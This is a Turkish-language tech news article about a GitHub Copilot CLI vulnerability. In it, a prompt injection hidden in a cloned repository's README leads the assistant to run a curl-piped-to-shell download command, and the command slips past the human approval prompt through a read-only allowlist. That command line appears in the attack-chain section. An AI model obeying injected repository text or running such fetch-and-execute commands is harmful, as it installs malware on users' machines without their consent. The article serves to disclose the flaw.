TechPusula
Yazılım

GitHub Copilot CLI'nin Güvenlik Açığı: Kötü Amaçlı Yazılım İndirme

GitHub Copilot CLI, kullanıcı onayı olmadan kötü amaçlı yazılım indirme riski taşıyor. Bu kritik zafiyetin detayları burada.

Paylas

GitHub Copilot CLI'nin Güvenlik Açığı

GitHub Copilot CLI, kullanıcıların onayını almadan zararlı shell komutlarının çalıştırılmasına olanak tanıyan güvenlik açıkları ile karşı karşıya. Bu yazıda, dış sunuculardan kötü amaçlı yazılımların nasıl indirilebileceğini ve çalıştırılabileceğini ele alıyoruz.

Copilot CLI'nin yeni sürümü, 2026 itibarıyla piyasaya sürüldü. Ancak, bu sürümdeki açıklar, komut doğrulama sistemini aşarak uzaktan kod yürütme (remote code execution) sağlamaktadır. Kullanıcı onayı olmadan potansiyel olarak tehlikeli komutlar çalıştırılabiliyor.

GitHub'ın Yanıtı

GitHub, durumu hızlıca değerlendirerek, "Raporunuzu inceledik ve bulgularınızı doğruladık. İçsel değerlendirmemiz sonucunda, bu durumun bilinen bir sorun olduğunu ve önemli bir güvenlik riski oluşturmadığını belirledik" açıklamasında bulundu.

Komut Yürütme Mekanizması

Copilot, kullanıcının izni olmadan kod veya bash komutlarının çalıştırılmasını önlemek için bir onay sistemi içermektedir. Ancak, eğer kullanıcı:

  • Komutu otomatik olarak çalıştıracak şekilde yapılandırmışsa veya

  • Komut, kaynak kodunda bulunan ve onay gerektirmeyen bir 'salt okunur' listeye dahilse,

onay istemi tetiklenmez.

Saldırı Zinciri

  1. Kullanıcı, GitHub Copilot CLI'ye sorgu gönderir. Örneğin, yeni klonladığı bir açık kaynak deposu üzerinde çalışırken Copilot'tan yardım ister.

  2. Copilot, kötü niyetli bir prompt enjeksiyonu ile karşılaşır. Bu, klonlanmış deponun README dosyasında saklanmaktadır.

  3. İnsan onayı mekanizması bypass edilir. Microsoft, dış URL izinlerinin kontrol edildiğini belirtmektedir, ancak bu izinler, bazı shell komutlarının (örneğin, curl) tespit edilememesi durumunda tetiklenmez. Örneğin, bir kötü amaçlı komut:

    env curl -s " | env sh

    Bu komut, kaynak kodunda yer alan bir 'salt okunur' listeye dahil olduğu için otomatik onay alır.

  4. Copilot, kullanıcı onayı olmadan kötü amaçlı yazılım indirir ve çalıştırır. Normalde, dosyalara yazma veya kod çalıştırma gibi komutlar, insan onayı talep ederken, burada bu gereklilik göz ardı edilmiştir.

Limitasyonlar ve Gelecek Araştırmalar

Bu açıklar, yalnızca macOS ile sınırlıdır. Ancak, GitHub Copilot'un daha fazla güvenlik açığı içermesi ve Windows'a özgü riskler taşıması söz konusu. Ayrıca, burada ele alınmayan komut ayrıştırma açıkları, keyfi dosya okuma ve yazma işlemlerine olanak tanımaktadır.

Sorumlu Açıklama

2026 yılı itibarıyla GitHub'a rapor edilen durum, kullanıcıların büyük bir risk altında olduğunu göstermektedir. GitHub bu sorunu çözmek için gerekli adımları atmadığı sürece, kullanıcıların dikkatli olması önerilmektedir.

Etiketler

#github
Can Berk Erdem

Yazar

Can Berk Erdem

TechPusula yazarı. Teknoloji ve dijital dönüşüm üzerine içerikler üretmektedir.

Tüm yazıları gör

Yorumlar

Henüz yorum yapılmamış. İlk yorumu siz yapın!

Yorum Yaz

0/2000

İlginizi Çekebilir

Tüm yazılar
Nvidia RTX Spark Dizüstü Bilgisayarları: AI PC Devrimi
Yazılım

Nvidia RTX Spark Dizüstü Bilgisayarları: AI PC Devrimi

Google, Yayıncıların AI Arama Özelliklerinden Çıkış Yapmasına İzin Vermeli
Yazılım

Google, Yayıncıların AI Arama Özelliklerinden Çıkış Yapmasına İzin Vermeli

Capstone: Çoklu Platform ve Mimaride Dağıtım Çerçevesi
Yazılım

Capstone: Çoklu Platform ve Mimaride Dağıtım Çerçevesi